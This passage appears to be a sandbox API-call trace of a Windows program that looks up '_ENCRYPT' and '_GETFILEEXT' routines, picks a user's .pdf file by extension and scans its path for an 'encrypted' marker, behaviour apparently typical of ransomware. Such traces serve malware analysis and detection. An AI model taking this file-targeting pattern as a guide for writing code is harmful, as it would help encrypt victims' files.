Flags=0x0, Size=0x10) returned 0x889220 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.552] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0035.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.552] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.552] CloseHandle (hObject=0x140) returned 1 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.553] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.553] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.554] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.554] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.554] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.554] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0xa69c42f0, ftLastWriteTime.dwHighDateTime=0x1d5bc28, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0x7c20c0 [0035.554] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0xa69c42f0, ftLastWriteTime.dwHighDateTime=0x1d5bc28, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0x7c20c0 [0035.554] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", 